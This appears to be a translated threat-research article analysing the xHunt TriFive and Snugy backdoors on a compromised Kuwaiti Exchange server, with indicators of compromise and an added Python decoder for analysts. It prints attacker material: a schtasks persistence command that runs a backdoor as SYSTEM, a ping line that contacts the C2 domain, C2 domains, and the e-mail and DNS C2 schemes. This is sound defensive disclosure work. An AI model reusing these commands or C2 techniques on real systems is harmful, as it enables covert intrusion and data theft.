2025-02-24 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com)05/31 Report--
This article explains in detail an example analysis of the TriFive and Snugy backdoors. The editor considers it very practical and shares it here for reference; we hope you find it useful.
Preface
The xHunt campaign has been active since July 2018 and mainly targets Kuwaiti government and shipping organizations. Recently, researchers found that the xHunt attackers compromised the Microsoft Exchange server of an organization in Kuwait. Although we cannot confirm how the attacker broke into the Exchange server, the creation timestamps of the scheduled tasks related to this incident show that the attacker had access to the server well before August 22, 2019. In this campaign the attacker used two backdoors, TriFive and a variant of Snugy, alongside a web shell we call BumbleBee.
Both TriFive and Snugy are PowerShell scripts that give the attackers continued access to the compromised Exchange server, each over a different C2 channel. TriFive uses an e-mail-based channel: it calls Exchange Web Services (EWS) to create message drafts in the Deleted Items folder of a compromised e-mail account. Snugy uses DNS tunneling for command and control.
TriFive and Snugy backdoors
In September 2020, we found that the xHunt attackers had compromised an organization in Kuwait. On the organization's Exchange server, commands were being executed through the IIS worker process w3wp.exe. To issue these commands, the attacker used a web shell called BumbleBee that had been installed on the compromised Exchange server. When we analyzed the server logs, we found two scheduled tasks created by the attacker, both of which run malicious PowerShell scripts. We cannot confirm whether either of these PowerShell scripts was used to install the web shell, but we believe the attacker had access to the Exchange server before the earliest logged event.
The attacker created two tasks, ResolutionHosts and ResolutionsHosts, on this Exchange server, both in the C:\Windows\System32\Tasks\Microsoft\Windows\WDI folder. By default, this folder also holds a legitimate task named ResolutionHost on Windows systems, as shown in the following figure. The legitimate ResolutionHost task belongs to the Windows Diagnostic Infrastructure (WDI) resolution host and provides interactive troubleshooting of problems on the system. We believe the attackers chose these task names mainly to blend in with it and hide their activity.
On August 28, 2019 and October 22, 2019, the attackers created the ResolutionHosts and ResolutionsHosts tasks to run two separate PowerShell-based backdoors. The two scheduled tasks serve as persistence mechanisms: each runs its PowerShell script repeatedly, but at a different interval. The following figure shows the two tasks with their creation times, run intervals and executed commands. The commands run splwow64.ps1 and OfficeIntegrator.ps1, which are the backdoor we call TriFive and the CASHY200 variant we call Snugy, respectively. The scripts are stored in two separate folders on the system, probably so that the discovery of one backdoor does not lead to the removal of both.
The figure also shows that the TriFive backdoor runs every 5 minutes, while Snugy runs every 30 minutes. We cannot confirm the reason for this difference, but it may be related to how conspicuous each backdoor's C2 channel is: Snugy's DNS tunnel is more visible than TriFive's e-mail-based channel and therefore more likely to be detected, which may explain why Snugy was given the longer interval.
We cannot confirm at this time how the attacker created the ResolutionHosts and ResolutionsHosts tasks. However, we know that when installing Snugy samples on other systems, the attackers used batch scripts to create scheduled tasks named SystemDataProvider and CacheTask. For example, the following batch script creates and runs a scheduled task named SystemDataProvider, which in turn runs a Snugy sample named xpsrchvw.ps1:
schtasks /create /sc MINUTE /mo 5 /tn "\Microsoft\Windows\SideShow\SystemDataProvider" /tr "powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1" /ru SYSTEM & schtasks /run /tn "\Microsoft\Windows\SideShow\SystemDataProvider"
TriFive backdoor
TriFive is a previously undocumented PowerShell backdoor that the xHunt attackers installed on the compromised Exchange server and ran every five minutes through a scheduled task. TriFive provides persistent backdoor access to the Exchange server by logging in to a legitimate user's mailbox and retrieving PowerShell scripts from e-mail drafts stored in the Deleted Items folder. The TriFive sample contains a legitimate account name and credentials belonging to the target organization, which indicates that the attacker had stolen those credentials before installing the backdoor.
E-mail-based C2 has also been used by the Hisoka tool. Hisoka likewise uses e-mail drafts to send and receive data, but its drafts remain in the Drafts folder, whereas TriFive deliberately saves its drafts to the Deleted Items folder.
To issue a command to the backdoor, the attacker logs in to the same legitimate e-mail account and creates a draft e-mail with the subject 555 whose body contains the command, encrypted and Base64-encoded. The following figure shows such a draft with the subject 555 and the body woFyeWt3cw==; the decoded command is executed through PowerShell:
To run the attacker's commands, the PowerShell script logs in to the legitimate e-mail account on the Exchange server and looks in the Deleted Items folder for an e-mail with the subject 555. The script opens the draft, Base64-decodes the body, and then decrypts the result by subtracting 10 from each character. It then executes the resulting plaintext with PowerShell's built-in Invoke-Expression (iex) cmdlet. After running the supplied PowerShell code, the script encrypts the output by adding 10 to each character and Base64-encodes the ciphertext. TriFive then returns the result to the attacker by placing the encoded ciphertext in the body of a new draft e-mail with the subject 555, saved in the Deleted Items folder. The following figure shows such a result draft created by the TriFive script: the subject is 555 and the body is bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA.
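The following Python is an added example, not code from the original article, that reproduces TriFive's draft-body encoding so that an analyst triaging a mailbox export can recover what was exchanged. It uses the two bodies quoted above; the text encoding of each (UTF-8 for the command body, UTF-16LE for the result body) is inferred from those two values, not stated on the page.

```python
import base64

SHIFT = 10  # TriFive adds 10 to each character before sending, subtracts 10 on receipt

# Draft bodies quoted in the article's figures (subject "555")
COMMAND_BODY = "woFyeWt3cw=="
RESULT_BODY = "bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA"


def trifive_decode(body: str, encoding: str) -> str:
    """Base64-decode a draft body, then subtract 10 from every character."""
    text = base64.b64decode(body).decode(encoding)
    return "".join(chr(ord(c) - SHIFT) for c in text)


def trifive_encode(plain: str, encoding: str) -> str:
    """Inverse of trifive_decode: add 10 to every character, then Base64-encode."""
    shifted = "".join(chr(ord(c) + SHIFT) for c in plain)
    return base64.b64encode(shifted.encode(encoding)).decode("ascii")


def decode_draft_body(body: str) -> dict:
    """Try both text encodings observed in the article (UTF-8 for commands,
    UTF-16LE for results) and keep only candidates that decode to printable
    text. Returns {encoding: plaintext}; an empty dict means the body does
    not look like TriFive traffic."""
    candidates = {}
    for enc in ("utf-8", "utf-16-le"):
        try:
            plain = trifive_decode(body, enc)
        except (ValueError, UnicodeDecodeError):
            # wrong encoding: odd UTF-16 length, or NUL bytes shifting below 0
            continue
        if plain and all(c.isprintable() for c in plain):
            candidates[enc] = plain
    return candidates


if __name__ == "__main__":
    for label, body in (("command", COMMAND_BODY), ("result", RESULT_BODY)):
        print(label, decode_draft_body(body))
```

Run against the page's two bodies, the command draft decodes to whoami and the result draft to a domain\username string, which matches the figures described above.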
The TriFive PowerShell script does not keep itself running with a loop; it relies on the ResolutionsHosts scheduled task mentioned above to run it repeatedly.
Snugy backdoor
The OfficeIntegrator.ps1 file run by the ResolutionHosts task is a PowerShell-based backdoor we call Snugy, which lets an attacker obtain the hostname of the target system and execute commands. Snugy is a variant of the CASHY200 backdoor used in previous xHunt activities. Trend Micro created a detection signature, Backdoor.PS1.NETERO.A, for this backdoor in July 2019, indicating that this particular CASHY200 variant has been around for more than a year.
The Snugy sample randomly selects one of the following domain names as its C2 domain:
hotsoft[.]icu
uplearn[.]top
lidarcc[.]icu
deman1[.]icu
Like earlier CASHY200 variants, Snugy uses the following command, with the generated domain name appended, to resolve that domain and then sends an ICMP request to the resolved IP address:
cmd /c ping -n 1 <domain>
Snugy extracts the IP address from the ping output with the following regular expression:
\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
The following shows the commands the Snugy backdoor processes from its C2 server:
The subdomain generated by Snugy contains a communication-type field that defines the order of the elements in the data field. The C2 domain structure is as follows:
Infrastructure related to xHunt
Indicators of compromise (IoC)
TriFive sample:
407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f
Snugy sample:
c18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393
6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127
efaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372
a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c
Snugy C2 domain names:
deman1[.]icu
hotsoft[.]icu
uplearn[.]top
lidarcc[.]icu
sharepoint-web[.]com
Scheduled task names:
ResolutionHosts
ResolutionsHosts
SystemDataProvider
CacheTask
This concludes the article "Sample Analysis of the TriFive and Snugy Backdoors". We hope the above content has been helpful and has taught you something new; if you found the article useful, please share it so that more people can read it.